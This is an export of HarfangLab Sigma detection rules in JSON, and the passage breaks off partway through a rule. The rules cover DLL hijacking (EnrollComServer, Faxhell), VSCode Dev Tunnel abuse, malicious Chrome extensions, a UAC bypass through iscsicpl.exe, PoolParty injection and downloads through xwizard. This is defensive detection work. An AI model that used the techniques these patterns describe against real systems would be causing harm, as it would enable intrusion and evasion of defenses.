"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_certenrollctrl.yml",
"content": "title: DLL Hijacking via EnrollComServer.exe\nid: 98a31d66-350a-4f80-b72f-5d09cae9b0b1\ndescription: |\n Detects potential Windows DLL Hijacking via EnrollComServer.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'EnrollComServer.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\certenroll.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "98a31d66-350a-4f80-b72f-5d09cae9b0b1",
"rule_name": "DLL Hijacking via EnrollComServer.exe",
"rule_description": "Detects potential Windows DLL Hijacking via EnrollComServer.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "98efda1d-a62f-43c8-95b7-45d3c6d579ee",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:35.294506Z",
"creation_date": "2026-03-23T11:45:35.294509Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:35.294516Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://isc.sans.edu/diary/Njrat+Campaign+Using+Microsoft+Dev+Tunnels/31724/",
"https://ipfyx.fr/post/visual-studio-code-tunnel/",
"https://code.visualstudio.com/docs/remote/tunnels",
"https://attack.mitre.org/techniques/T1572/",
"https://attack.mitre.org/techniques/T1090/",
"https://attack.mitre.org/techniques/T1567/"
],
"name": "t1090_vs_code_tunnel_dns.yml",
"content": "title: Suspicious VSCode Tunnel DNS Request\nid: 98efda1d-a62f-43c8-95b7-45d3c6d579ee\ndescription: |\n Detects a non-standard process performing DNS resolution requests to Microsoft Dev Tunnel domains.\n Since July 2023, Microsoft Visual Studio Code includes a feature called Dev Tunnels that allows remote access to a system by exposing local services through Microsoft-managed infrastructure.\n Threat actors have abused this functionality to gain persistent remote access, bypass network restrictions, and evade traditional remote access detections by leveraging trusted Microsoft domains.\n This detection focuses on identifying Dev Tunnel usage initiated by unexpected or unauthorized processes rather than legitimate developer tools (such as code.exe or code-server).\n It is recommended to investigate the actions performed by this process to determine its legitimacy.\nreferences:\n - https://isc.sans.edu/diary/Njrat+Campaign+Using+Microsoft+Dev+Tunnels/31724/\n - https://ipfyx.fr/post/visual-studio-code-tunnel/\n - https://code.visualstudio.com/docs/remote/tunnels\n - https://attack.mitre.org/techniques/T1572/\n - https://attack.mitre.org/techniques/T1090/\n - https://attack.mitre.org/techniques/T1567/\ndate: 2023/09/25\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1090\n - attack.t1572\n - attack.exfiltration\n - attack.t1567\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Behavior.Tunneling\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName|contains:\n - '.tunnels.api.visualstudio.com'\n - '.devtunnels.ms'\n\n filter_vscode:\n - ProcessImage|endswith:\n - '\\code-tunnel.exe'\n - '\\Code - Insiders.exe'\n - '\\Code.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n - ProcessOriginalFileName: 'electron.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n filter_visualstudio:\n # C:\\Program Files\\Microsoft Visual Studio\\2022\\Enterprise\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.Dotnet.x64\\ServiceHub.Host.dotnet.x64.exe\n # C:\\Program Files\\Microsoft Visual Studio\\18\\Community\\Common7\\ServiceHub\\Hosts\\ServiceHub.Host.Extensibility.amd64\\DevHub.exe\n ProcessOriginalFileName:\n - 'ServiceHub.Host.dotnet.x64.dll'\n - 'DevHub.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n filter_browser:\n - ProcessOriginalFileName:\n - 'ChromiumPortable.exe'\n - 'YandexBrowser.exe' # Chromium Based Browsers\n - 'yandex.exe'\n - 'iridium.exe'\n - 'chrome.exe'\n - 'chromium.exe'\n - '7star.exe'\n - '7xing.exe'\n - 'torch.exe'\n - 'chromeplus.exe'\n - 'kometa.exe'\n - 'amigo.exe'\n - 'brave.exe'\n - 'centbrowser.exe'\n - 'chedot.exe'\n - 'orbitum.exe'\n - 'sputnik.exe'\n - 'dragon.exe'\n - 'vivaldi.exe'\n - 'citrio.exe'\n - '360chrome.exe'\n - 'uran.exe'\n - 'liebao.exe'\n - 'elementsbrowser.exe'\n - 'epic.exe'\n - 'coccocbrowser.exe'\n - 'qipsurf.exe'\n - 'coowon.exe'\n - 'msedge.exe'\n - 'qqbrowser.exe'\n - 'firefox.exe' # Firefox Based Browsers\n - 'waterfox.exe'\n - 'palemoon.exe'\n - 'librewolf.exe'\n - 'basilisk.exe'\n - 'seamonkey.exe'\n - 'icedragon.exe'\n - 'zen.exe'\n - 'msedgewebview2.exe'\n - 'sidekick.exe'\n - ProcessDescription: 'Opera Internet Browser'\n\n exclusion_misc_windows:\n ProcessImage:\n - '?:\\Windows\\System32\\PING.EXE'\n - '?:\\Windows\\SysWOW64\\PING.EXE'\n - '?:\\Windows\\System32\\ipconfig.exe'\n - '?:\\Windows\\SysWOW64\\ipconfig.exe'\n - '?:\\Windows\\System32\\wbem\\WmiPrvSE.exe'\n - '?:\\Windows\\System32\\wbem\\WmiApSrv.exe'\n - '?:\\Windows\\System32\\smartscreen.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n ProcessParentImage: '?:\\Windows\\System32\\services.exe'\n\n exclusion_mcafee:\n ProcessImage: '?:\\Program Files\\McAfee\\Endpoint Security\\Adaptive Threat Protection\\mfeatp.exe'\n\n exclusion_defender:\n ProcessOriginalFileName:\n - 'MsMpEng.exe'\n - 'MsSense.exe'\n - 'NisSrv.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows Publisher'\n\n exclusion_nexthink:\n ProcessOriginalFileName: 'nxtsvc.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NEXThink S.A.'\n\n exclusion_fsecure:\n ProcessOriginalFileName: 'fshoster64.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'WithSecure Oyj'\n\n exclusion_zsatunnel:\n ProcessOriginalFileName: 'ZSATunnel.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Zscaler, Inc.'\n\n exclusion_sentinelone:\n ProcessOriginalFileName: 'SentinelAgent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Sentinelone, Inc.'\n\n exclusion_kaspersky:\n ProcessOriginalFileName: 'avp.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Kaspersky Lab JSC'\n\n exclusion_postman:\n ProcessImage|endswith: '\\Postman.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Postman, Inc.'\n\n exclusion_iisexpress:\n ProcessImage: '?:\\Program Files\\IIS Express\\iisexpress.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n exclusion_trustlane:\n ProcessImage: '?:\\Program Files\\trustlane\\trustlane_authentication_agent.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Olfeo SAS'\n\n exclusion_opera:\n ProcessDescription: 'Opera GX Internet Browser'\n ProcessSigned: 'true'\n ProcessSignature: 'Opera Norway AS'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "98efda1d-a62f-43c8-95b7-45d3c6d579ee",
"rule_name": "Suspicious VSCode Tunnel DNS Request",
"rule_description": "Detects a non-standard process performing DNS resolution requests to Microsoft Dev Tunnel domains.\nSince July 2023, Microsoft Visual Studio Code includes a feature called Dev Tunnels that allows remote access to a system by exposing local services through Microsoft-managed infrastructure.\nThreat actors have abused this functionality to gain persistent remote access, bypass network restrictions, and evade traditional remote access detections by leveraging trusted Microsoft domains.\nThis detection focuses on identifying Dev Tunnel usage initiated by unexpected or unauthorized processes rather than legitimate developer tools (such as code.exe or code-server).\nIt is recommended to investigate the actions performed by this process to determine its legitimacy.\n",
"rule_creation_date": "2023-09-25",
"rule_modified_date": "2026-02-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1090",
"attack.t1567",
"attack.t1572"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9960b6cd-823d-45d5-ba7a-6ee09be5d019",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072131Z",
"creation_date": "2026-03-23T11:45:34.072134Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072138Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://windows-internals.com/faxing-your-way-to-system/",
"https://github.com/ionescu007/faxhell",
"https://borncity.com/win/2020/05/14/windows-print-spooler-exploit-fr-cve-2020-1048/"
],
"name": "t1574_001_persistence_dll_hijack_fax_ualapi.yml",
"content": "title: Fax Service DLL Hijack Detected\nid: 9960b6cd-823d-45d5-ba7a-6ee09be5d019\ndescription: |\n Detects the execution of a DLL hijack of the Fax service, which natively tries to load the non-existant ualapi.dll DLL from system32 directory.\n This DLL can be planted by exploiting the CVE-2020-1048 / CVE-2020-1337 (aka Faxhell).\n It is recommended to investigate the process that dropped the DLL into the System32 directory, as well as to analyze the loaded DLL to look for malicious content.\nreferences:\n - https://windows-internals.com/faxing-your-way-to-system/\n - https://github.com/ionescu007/faxhell\n - https://borncity.com/win/2020/05/14/windows-print-spooler-exploit-fr-cve-2020-1048/\ndate: 2020/10/02\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.defense_evasion\n - attack.t1574.001\n - attack.t1574.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.DLLHijacking\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ImageLoaded|endswith: '\\ualapi.dll'\n Image|endswith: '\\fxssvc.exe'\n\n exclusion_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9960b6cd-823d-45d5-ba7a-6ee09be5d019",
"rule_name": "Fax Service DLL Hijack Detected",
"rule_description": "Detects the execution of a DLL hijack of the Fax service, which natively tries to load the non-existant ualapi.dll DLL from system32 directory.\nThis DLL can be planted by exploiting the CVE-2020-1048 / CVE-2020-1337 (aka Faxhell).\nIt is recommended to investigate the process that dropped the DLL into the System32 directory, as well as to analyze the loaded DLL to look for malicious content.\n",
"rule_creation_date": "2020-10-02",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1574.001",
"attack.t1574.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9963d7f5-15c6-4511-91d7-ac2beed21c1d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089586Z",
"creation_date": "2026-03-23T11:45:34.089588Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089592Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/",
"https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html",
"https://attack.mitre.org/techniques/T1176/"
],
"name": "t1176_chrome_extensions_load_macos.yml",
"content": "title: Suspicious Extensions Loaded by Chrome-based Browser (macOS)\nid: 9963d7f5-15c6-4511-91d7-ac2beed21c1d\ndescription: |\n Detects a Chrome-based browser launched with a specific argument that permit to load extensions from a specific folder.\n Adversaries may replace legitimate browser shortcut by a one that will load a malicious extension on process startup.\n Detects a Chrome-based browser launched with a specific argument that permits to load extensions from a specific folder.\n Adversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\n It is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\nreferences:\n - https://cloud.google.com/blog/topics/threat-intelligence/lnk-between-browsers/\n - https://www.trendmicro.com/fr_fr/research/23/k/parasitesnatcher-how-malicious-chrome-extensions-target-brazil-.html\n - https://attack.mitre.org/techniques/T1176/\ndate: 2024/10/30\nmodified: 2025/02/11\nauthor: HarfangLab\ntags:\n - attack.persistence\n - attack.t1176\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.SensitiveInformation\n - classification.macOS.Behavior.Persistence\nlogsource:\n product: macos\n category: process_creation\ndetection:\n selection:\n CommandLine|re: '--load-extension=[^ ]'\n ProcessParentImage: '/sbin/launchd'\n\n condition: selection\nlevel: high\nconfidence: strong",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9963d7f5-15c6-4511-91d7-ac2beed21c1d",
"rule_name": "Suspicious Extensions Loaded by Chrome-based Browser (macOS)",
"rule_description": "Detects a Chrome-based browser launched with a specific argument that permit to load extensions from a specific folder.\nAdversaries may replace legitimate browser shortcut by a one that will load a malicious extension on process startup.\nDetects a Chrome-based browser launched with a specific argument that permits to load extensions from a specific folder.\nAdversaries may replace legitimate browser shortcuts with one that will load a malicious extension on process startup.\nIt is recommended to check the content of the folder specified in the load-extension parameter for malicious extensions.\n",
"rule_creation_date": "2024-10-30",
"rule_modified_date": "2025-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.persistence"
],
"rule_technique_tags": [
"attack.t1176"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "99813d1f-9698-4995-907d-141014a3ed6f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.595185Z",
"creation_date": "2026-03-23T11:45:34.595188Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.595196Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_iscsicpl.yml",
"content": "title: UAC Bypass via iscsicpl.exe\nid: 99813d1f-9698-4995-907d-141014a3ed6f\ndescription: |\n Detects a potential User Account Control bypass exploiting Windows DLL search Order Hijacking via iscsicpl.exe.\n The iscsicpl.exe binary is configured to auto-elevate privileges and is vulnerable to a DLL Search Order hijacking vulnerability when running 32 bit Microsoft binary on a 64 bit system via SysWOW64.\n This 32 bit binary, will perform a search within user path for the DLL iscsiexe.dll.\n It is recommended to check for malicious behavior from processes modifying HKCU\\Environment\\Path and any parents of iscsicpl.exe. You should also investigate activity of any iscsicpl.exe children processes.\nreferences:\n - https://github.com/hackerhouse-opensource/iscsicpl_bypassUAC\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/07/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'iscsicpl.exe'\n ImageLoaded|endswith: '\\iscsiexe.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "99813d1f-9698-4995-907d-141014a3ed6f",
"rule_name": "UAC Bypass via iscsicpl.exe",
"rule_description": "Detects a potential User Account Control bypass exploiting Windows DLL search Order Hijacking via iscsicpl.exe.\nThe iscsicpl.exe binary is configured to auto-elevate privileges and is vulnerable to a DLL Search Order hijacking vulnerability when running 32 bit Microsoft binary on a 64 bit system via SysWOW64.\nThis 32 bit binary, will perform a search within user path for the DLL iscsiexe.dll.\nIt is recommended to check for malicious behavior from processes modifying HKCU\\Environment\\Path and any parents of iscsicpl.exe. You should also investigate activity of any iscsicpl.exe children processes.\n",
"rule_creation_date": "2022-07-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9994e158-8140-4487-9d9d-7fd096b4b4bb",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.070525Z",
"creation_date": "2026-03-23T11:45:34.070527Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.070535Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thehackernews.com/2023/12/new-poolparty-process-injection.html",
"https://attack.mitre.org/techniques/T1055/"
],
"name": "t1055_poolparty_process_access.yml",
"content": "title: Possible Process Injection Using PoolParty\nid: 9994e158-8140-4487-9d9d-7fd096b4b4bb\ndescription: |\n Detects an attempt to open a process with specific permissions required by the Pool Party injection methods.\n These specific permissions allow an attacker to perform code injection using the Pool Party techniques, exploiting the Windows user-mode thread pool.\n Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.\n It is recommended to investigate both the accessing and targeted processes activities.\nreferences:\n - https://thehackernews.com/2023/12/new-poolparty-process-injection.html\n - https://attack.mitre.org/techniques/T1055/\ndate: 2023/12/12\nmodified: 2025/11/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1055\n - classification.Windows.Source.ProcessAccess\n - classification.Windows.Behavior.ProcessInjection\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: process_access\ndetection:\n selection:\n # PROCESS_QUERY_LIMITED_INFORMATION|PROCESS_QUERY_INFORMATION|PROCESS_DUP_HANDLE|PROCESS_VM_WRITE|PROCESS_VM_READ|PROCESS_VM_OPERATION\n GrantedAccess: '0x1478'\n ProcessImage|contains: '\\'\n\n exclusion_lsass:\n ProcessImage:\n - '?:\\Windows\\System32\\lsass.exe'\n - '\\Device\\VhdHardDisk{????????-????-????-????-????????????}\\Windows\\System32\\lsass.exe'\n - '\\Device\\HarddiskVolume*\\Windows\\System32\\lsass.exe'\n\n exclusion_svchost:\n ProcessImage: '?:\\Windows\\System32\\svchost.exe'\n\n exclusion_windows_store:\n ProcessImage|endswith:\n - '\\MpSigStub.exe'\n - '\\AM_Base.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Microsoft Windows Publisher'\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n\n exclusion_mcafee:\n ProcessSigned: 'true'\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'McAfee, LLC'\n - 'MUSARUBRA US LLC' # new signer name for mcafee/trellix it seems\n\n exclusion_eset:\n ProcessImage:\n - '?:\\Program Files\\ESET\\ESET File Security\\ekrn.exe'\n - '?:\\Program Files\\ESET2\\ESET File Security\\ekrn.exe'\n - '?:\\Program Files\\ESET\\ESET Security\\ekrn.exe'\n - '?:\\Program Files\\ESET2\\ESET Security\\ekrn.exe'\n - '?:\\Program Files\\ESET\\ESET Endpoint Security\\ekrn.exe'\n - '?:\\Program Files\\ESET2\\ESET Endpoint Security\\ekrn.exe'\n - '?:\\Program Files\\ESET\\ESET Endpoint Antivirus\\ekrn.exe'\n - '?:\\Program Files\\ESET2\\ESET Endpoint Antivirus\\ekrn.exe'\n\n exclusion_eset_signature:\n ProcessImage|endswith: '\\ekrn.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ESET, spol. s r.o.'\n\n exclusion_panda:\n ProcessImage|endswith: '\\PSANHost.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Panda Security S.L.'\n - 'Panda Security, S.L.'\n\n exclusion_adobearm:\n ProcessImage|endswith: '\\AdobeARM.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Adobe Inc.'\n\n exclusion_defender:\n # AntiMalware Definition Update\n ProcessOriginalFileName: 'NIS_Full.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Corporation'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9994e158-8140-4487-9d9d-7fd096b4b4bb",
"rule_name": "Possible Process Injection Using PoolParty",
"rule_description": "Detects an attempt to open a process with specific permissions required by the Pool Party injection methods.\nThese specific permissions allow an attacker to perform code injection using the Pool Party techniques, exploiting the Windows user-mode thread pool.\nAdversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges.\nIt is recommended to investigate both the accessing and targeted processes activities.\n",
"rule_creation_date": "2023-12-12",
"rule_modified_date": "2025-11-13",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1055"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "99afba1b-3560-4a5a-8e16-3a4e64477931",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.628159Z",
"creation_date": "2026-03-23T11:45:34.628161Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.628165Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Xwizard/",
"https://x.com/0gtweet/status/1842252508841832864",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_xwizard_lolbas_download.yml",
"content": "title: File Downloaded via Xwizard\nid: 99afba1b-3560-4a5a-8e16-3a4e64477931\ndescription: |\n Detects a suspicious execution of Xwizard executable or DLL to download a file.\n The downloaded file is saved in one of these locations:\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\<8_RANDOM_ALNUM_CHARS>\\[1].\n - %LocalAppData%\\Microsoft\\Windows\\INetCache\\IE\\<8_RANDOM_ALNUM_CHARS>\\[1].\n Adversaries may transfer tools or other files to a compromised environment using legitimate tool to evade detection.\n It is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Xwizard/\n - https://x.com/0gtweet/status/1842252508841832864\n - https://attack.mitre.org/techniques/T1105/\ndate: 2022/11/18\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Xwizard\n - classification.Windows.Behavior.FileDownload\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_exe_image:\n Image|endswith: '\\xwizard.exe'\n # Renamed binaries\n OriginalFileName: 'xwizard.exe'\n\n selection_exe_cmdline:\n CommandLine|contains|all:\n - ' RunWizard '\n - ' 